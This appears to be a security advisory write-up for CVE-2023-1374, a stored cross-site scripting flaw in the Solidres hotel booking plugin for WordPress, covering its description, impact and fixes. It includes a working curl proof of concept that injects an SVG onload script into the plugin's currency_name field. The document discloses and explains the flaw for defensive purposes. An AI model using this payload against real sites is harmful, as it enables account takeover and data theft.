CVE-2023-1374 - Solidres <= 0.9.4 - Authenticated (Admin+) Stored Cross-Site Scripting

Introduction

Cross-Site Scripting (XSS) is a type of security vulnerability that allows attackers to inject malicious code into web pages viewed by other users. The vulnerability can be exploited by attackers to steal user data, take over user accounts, and launch other malicious attacks. In this technical writeup, we will discuss a POST-based XSS vulnerability that was discovered in the Solidres – Hotel booking plugin for WordPress version 0.9.4.

Description

The Solidres – Hotel booking plugin for WordPress version 0.9.4 is vulnerable to a POST-based XSS vulnerability that exists in the "add new currency" feature of the plugin. The vulnerability allows an attacker to inject malicious code into the currency_name parameter of the POST request. The currency_name parameter is not properly sanitized before being used in the plugin's code, which allows an attacker to inject malicious code into the plugin's output.

Here's The Proof Of Concept

curl 'http://example.com/wp-admin/admin.php?page=sr-add-new-currency' \
-X POST \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \
-H 'Accept-Language: en-GB,en;q=0.5' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'Referer: http://example.com/wp-admin/admin.php?page=sr-add-new-currency' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://example.com' \
-H 'Connection: keep-alive' \
-H 'Cookie: <redacted>' \
-H 'Upgrade-Insecure-Requests: 1' \
--data-raw 'srform%5Bcurrency_name%5D=%22%3E%3Csvg%2Fonload%3Dprompt%28%2FXSS%2F%29%3E&srform%5Bcurrency_code%5D=123&srform%5Bsign%5D=123&srform%5Bexchange_rate%5D=123&srform%5Bstate%5D=1&srform%5Bfilter_range%5D=&save_currency=Save'

The above POST data contains a malicious SVG tag that is injected into the currency_name parameter. When the plugin processes the POST request, it includes the SVG tag in the output without properly sanitizing it. As a result, the SVG tag is executed in the user's browser, which triggers a prompt box with the message "XSS".

Impact

This vulnerability can be exploited by an attacker to steal user data, take over user accounts, and launch other malicious attacks. For example, an attacker can inject a script that steals the user's session cookie, which can be used to take over the user's account. The attacker can also inject a script that redirects the user to a malicious website, which can be used to download malware onto the user's computer.

Solution

To fix the vulnerability, the currency_name parameter of the POST request should be properly sanitized before being used in the plugin's code. The plugin developers should also implement a Content Security Policy (CSP) to mitigate the impact of any potential XSS attacks. The plugin developers should release a patch as soon as possible to address the vulnerability.

Conclusion

The POST-based XSS vulnerability in the Solidres – Hotel booking plugin for WordPress version 0.9.4 can be exploited by an attacker to steal user data, take over user accounts, and launch other malicious attacks. The vulnerability exists in the "add new currency" feature of the plugin, and can be exploited by injecting a malicious SVG tag into the currency_name parameter of the POST request. To mitigate the vulnerability, the plugin developers should properly sanitize the currency_name parameter and implement a Content Security Policy (CSP). Users of the plugin should update to the latest version as soon as a patch is released.

References

• https://www.cve.org/CVERecord?id=CVE-2023-1374
• https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/solidres/solidres-094-authenticated-admin-stored-cross-site-scripting